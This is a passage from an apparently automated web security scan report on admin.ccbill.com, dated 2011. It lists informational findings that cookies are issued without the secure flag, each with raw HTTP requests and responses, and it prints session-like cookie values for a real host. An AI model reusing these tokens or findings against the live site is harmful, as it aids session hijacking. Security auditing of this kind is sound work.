DCTMSESSION=b3htTc2TXm501fjhWlLCyxYR5L9TfZdjhpBQbQLJvRlyl8ClTHFL!1272186516; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:27:58 GMT
Content-length: 3726
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=b3htTc2TXm501fjhWlLCyxYR5L9TfZdjhpBQbQLJvRlyl8ClTHFL!1272186516; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">

//-----------------------------------
...[SNIP]...

7.2. https://admin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmc=250776793; __utmb=250776793.6.10.1310490247

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:51 GMT
Location: login.cgi
Content-Length: 193
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="login.cgi">here</a>.</p>
</body></html>

7.3. https://admin.ccbill.com/adminBanners/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/adminBanners/blank.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adminBanners/blank.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Sat, 23 Oct 2010 00:42:07 GMT
ETag: "53eb57-31-4933e075355c0"
Accept-Ranges: bytes
Content-Length: 49
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a...................!.......,...........T..;

7.4. https://admin.ccbill.com/ccbillLogin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ccbillLogin.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbillLogin.css?2 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:03 GMT
Last-Modified: Sat, 23 Oct 2010 00:03:54 GMT
ETag: "41124b-3b31-4933d7ea6ee80"
Accept-Ranges: bytes
Content-Length: 15153
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

html {
height: 100%;
}
body {
margin: 0px;
height: 100%;
width: 100%;
padding: 0px;
background-color:white;
scrollbar-3d-light-color:#cccccc;
scrollbar-arrow-
...[SNIP]...

7.5. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/adapter/ext/ext-base.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/adapter/ext/ext-base.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Fri, 09 Jan 2009 19:53:24 GMT
ETag: "1680716-8c06-460121c1a3500"
Accept-Ranges: bytes
Content-Length: 35846
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext={version:"2.2"};window["undefined"]=window["undefined"];Ext.app
...[SNIP]...

7.6. https://admin.ccbill.com/ext-2.2/custom/combos.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/combos.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/combos.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Wed, 10 Dec 2008 00:38:55 GMT
ETag: "1680888-25e-45da67c1be5c0"
Accept-Ranges: bytes
Content-Length: 606
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

.search-item {
font:normal 11px tahoma, arial, helvetica, sa
...[SNIP]...

7.7. https://admin.ccbill.com/ext-2.2/custom/login.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/login.js?26 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:00 GMT
ETag: "41152-20f8-4933d7f027c00"
Accept-Ranges: bytes
Content-Length: 8440
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var login;
var loginType;
Ext.namespace('Ext.loginstore');

Ext.loginstore.loginType = [
['-select one-'],
['Client'],
['Affiliate']
];

var alertBox;
var alertText
...[SNIP]...

7.8. https://admin.ccbill.com/ext-2.2/custom/password.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/password.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/password.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:01 GMT
ETag: "57f36b-2bca-4933d7f11be40"
Accept-Ranges: bytes
Content-Length: 11210
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var passwordWindow;
var msgWindow;
var windowType = 'lost'; //default window type

var accountType2;
var selectedOption = 'email';
var megamenus = (window.location.href.match(/(loginMM|megamenus)/
...[SNIP]...

7.9. https://admin.ccbill.com/ext-2.2/ext-all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/ext-all.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/ext-all.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

7.10. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/css/ext-all.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/css/ext-all.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 09 Jan 2009 18:46:28 GMT
ETag: "5807b8-142ac-460112cbae900"
Accept-Ranges: bytes
Content-Length: 82604
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset
...[SNIP]...

7.11. https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/button/btn-sprite.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/button/btn-sprite.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Last-Modified: Fri, 09 Jan 2009 18:48:12 GMT
ETag: "40a3b-53d-4601132edd300"
Accept-Ranges: bytes
Content-Length: 1341
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a........<t.M~%W.Hn.Jq.U}.@.@f..g..j..l..z..{..}....o..q.....0..0..5..5..5..;..:..;..;..G..I..A..B..A..H..I..I..I..P..Q..P..X..X..Y..a..a..`..j..i..r..q..r..z..y..z...............................
...[SNIP]...

7.12. https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/form/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "168094c-333-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 819
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

7.13. https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/form/trigger.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/trigger.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "409a3-718-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 1816
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89af......1P.3Q.2R.3R.4S.5S.5S.5T.5T.@.@~............................................................................................................................................................
...[SNIP]...

7.14. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow-c.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-c.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "420e24-76-460113151d640"
Accept-Ranges: bytes
Content-Length: 118
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR..............o&.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bd``.`@.L.X..........BS.......IEND.B`.

7.15. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow-lr.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-lr.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "5808aa-87-460113151d640"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...)IDATx.bd``..bn ... >.....@..J.`b ........-...o......IEND.B`.

7.16. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "16809de-137-460113151d640"
Accept-Ranges: bytes
Content-Length: 311
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR.......0.....2.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=..0..[PAQ..`...... ......
...^..#a.&...C..H.s.
....#&C... 1.R...D...."!caJ..)..3!S..n.Y8
..!v.H....EE.x.X..,4.5.Bh..
...[SNIP]...

7.17. https://admin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
